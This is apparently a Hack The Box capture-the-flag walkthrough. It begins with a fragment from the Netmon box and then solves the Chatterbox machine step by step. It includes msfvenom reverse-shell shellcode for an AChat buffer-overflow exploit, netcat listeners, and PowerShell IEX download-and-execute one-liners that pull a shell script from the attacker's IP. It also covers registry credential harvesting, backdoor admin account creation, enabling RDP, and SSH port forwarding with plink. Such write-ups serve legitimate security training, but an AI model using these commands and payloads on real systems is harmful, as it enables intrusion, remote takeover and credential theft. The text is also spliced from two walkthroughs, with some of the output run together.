[+] User SMB session establishd on 10.10.10.152...
[+] IP: 10.10.10.152:445 Name: 10.10.10.152 
Disk Permissions
---- -----------
ADMIN$ READ, WRITE
C$ READ, WRITE
IPC$ READ ONLY
root@kali:~/htb/netmon# smbclient -U puck //10.10.10.152/C$
Enter WORKGROUP\puck's password: iestyle2019!
Try "help" to get a list of possible commands.
smb: \> cd users
smb: \users\> cd administrator
smb: \users\administrator\> cd desktop
smb: \users\administrator\desktop\> dir
. DR 0 Sat Feb 2 23:35:23 2019
.. DR 0 Sat Feb 2 23:35:23 2019
desktop.ini AHS 282 Sun Feb 3 07:08:39 2019
root.txt A 33 Sat Feb 2 23:35:24 2019

5114367 blocks of size 4096. 2942845 blocks available
smb: \users\administrator\desktop\> type root.txt
type: command not found
smb: \users\administrator\desktop\> get root.txt
getting file \users\administrator\desktop\root.txt of size 33 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)


root@kali:~/htb# psexec.py 'puck:iestyle2019!@10.10.10.152'
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file NRMENACm.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service LksA on 10.10.10.152.....
[*] Starting service LksA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
301*****7cc
* Enable RDP access

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

net user puck iestyle2019! /add ;net localgroup administrators puck /add
root@kali:~/htb/netmon# xfreerdp /u:"puck" /v:10.10.10.152:3389
[15:23:04:318] [2387:2388] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[15:23:04:450] [2387:2388] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[15:23:04:450] [2387:2388] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[15:23:04:450] [2387:2388] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[15:23:04:450] [2387:2388] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.10.10.152:3389) 
[15:23:04:451] [2387:2388] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[15:23:04:451] [2387:2388] [ERROR][com.freerdp.crypto] - Common Name (CN):
[15:23:04:451] [2387:2388] [ERROR][com.freerdp.crypto] - netmon
[15:23:04:451] [2387:2388] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.10.10.152:3389 (RDP-Server):
Common Name: netmon
Subject: CN = netmon
Issuer: CN = netmon
Thumbprint: 86:b8:93:52:0b:cb:d3:63:ea:05:ca:ad:16:c0:ba:c4:25:e6:13:84
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) y
Password: iestyle2019!

Author: Jacco Straathof

HTB – Chatterbox

Chatterbox is a pretty simple box and reminds me a lot of something you run across in the OSCP labs. Overall it’s pretty easy, the only sort of tricky part is with privesc if you aren’t familiar with port forwarding. If you follow my Windows Privilege Escalation Guide on this one, you’ll be golden. Before you do the box, make sure you’ve reset it otherwise you won’t get a shell.
root@kali:~/htb# nmap -p- 10.10.10.74
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 08:24 EDT
Stats: 0:12:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.42% done; ETC: 09:02 (0:25:10 remaining)
Stats: 0:12:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.52% done; ETC: 09:02 (0:25:09 remaining)
Nmap scan report for 10.10.10.74
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
9255/tcp open mon
9256/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 1662.31 seconds
Looks like AChat is our target. A quick Google returns an exploit in python:
https://www.exploit-db.com/exploits/36025/The exploit payload is currently only going to run calc.exe, so we’ll need to generate a reverse shellcode payload. We can do this with msfvenom. Lucky for us the author of the exploit was nice enough to specify his exact command used in the comments, so we know the correct options along with which bad characters to exclude

root@kali:~/htb# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.5 lport=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' EXITFUNC=thread BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3706 bytes
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
--snip--
buf += "\x70\x47\x4a\x73\x51\x62\x42\x4f\x72\x4a\x39\x70\x42"
buf += "\x33\x69\x6f\x59\x45\x41\x41"
root@kali:~/htb#

We can go ahead and edit the exploit with our newly generated shellcode. Start up a netcat listener and run our exploit.

There seemed to be a file permissions misconfiguration on the local administrators folder, and the root.txt file. I assumed this was the method we were supposed to take to get the root.txt flag. root.txt is owned by Alfred so we can use icacls to give full permissions on the root.txt file so we can read it.

root@kali:~/htb# python achat.py 
---->{P00F}!
root@kali:~/htb# rlwrap nc -lvp 443 listening on [any] 443 ... 10.10.10.74: inverse host lookup failed: Unknown host connect to [10.10.14.2] from (UNKNOWN) [10.10.10.74] 49157 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami
whoami chatterbox\alfred
C:\Users\Administrator\Desktop>type root.txt 
type root.txt Access is denied.

C:\Users\Administrator\Desktop>dir /Q
dir /Q
Volume in drive C has no label.
Volume Serial Number is 9034-6528

Directory of C:\Users\Administrator\Desktop

12/10/2017 07:50 PM <DIR> BUILTIN\Administrators .
12/10/2017 07:50 PM <DIR> NT AUTHORITY\SYSTEM ..
12/10/2017 07:50 PM 32 CHATTERBOX\Alfred root.txt
1 File(s) 32 bytes
2 Dir(s) 17,932,922,880 bytes free



C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop 
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
CHATTERBOX\Administrator:(OI)(CI)(ID)F 
BUILTIN\Administrators:(OI)(CI)(ID)F 
CHATTERBOX\Alfred:(OI)(CI)(ID)F
C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
cacls root.txt /g Alfred:r
y Are you sure (Y/N)?processed file: C:\Users\Administrator\Desktop\root.txt C:\Users\Administrator\Desktop>type root.txt
a67*****c7c

Privilege Escalation

After running through some basic privilege escalation enumeration (ahem) we find some credentials in the registry for autologon.

C:\Windows\Panther>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    DefaultPassword    REG_SZ    Welcome1!

Attempting to re-use this password with the Administrator account is successful, and can be
achieved using powershell or by opening SMB and using impacket’s psexec. Using powershell, the command

$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('administrator' $passwd)

will store the credentials in $creds for the session. A reverse shell can now be opened with the supplied credentials using the command

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.2/puckieshell53.ps1')" -Credential $creds

It’s possible that password reuse may be at play here for the Administrator. To exploit this we’ll need to open up SMB on our target. We can do this by uploading plink.exe to our target and port forwarding over port 445.

First we start up our python http server.

root@kali:~/pwk# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.74 - - [20/Aug/2019 08:40:06] "GET /plink.exe HTTP/1.1" 200 -

Next we’ll download plink.exe using a powershell one liner.

C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.2/plink.exe', 'plink.exe')"

Start SSH service on our attacking box.

root@kali:~/htb/chatterbox# service ssh start

And run plink.exe from our target to forward the port over SSH.

C:\Users\Alfred>plink.exe -l puck -pw iestyle -R 445:127.0.0.1:445 10.10.14.5
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 fc:4d:bc:2f:51:41:40:0d:2e:e2:86:a6:06:fb:98:88
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y


The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 10 09:31:17 2017 from 10.10.10.43

root@kali:~# 

We can verify the port forward is working with netstat.

root@kali:~/htb/chatterbox# netstat -ano | grep 445
tcp        0      0 127.0.0.1:445           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:445                 :::*                    LISTEN      off (0.00/0/0)

Excellent. Now let’s use winexe to get a shell.

root@kali:~/htb/chatterbox# winexe -U Administrator //127.0.0.1 "cmd.exe"
Enter password:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\administrator
C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5/puckieshell53.ps1', 'puckieshell53.ps1')"
C:\Users\Alfred>powershell -ExecutionPolicy ByPass -File puckieshell53.ps1

Success!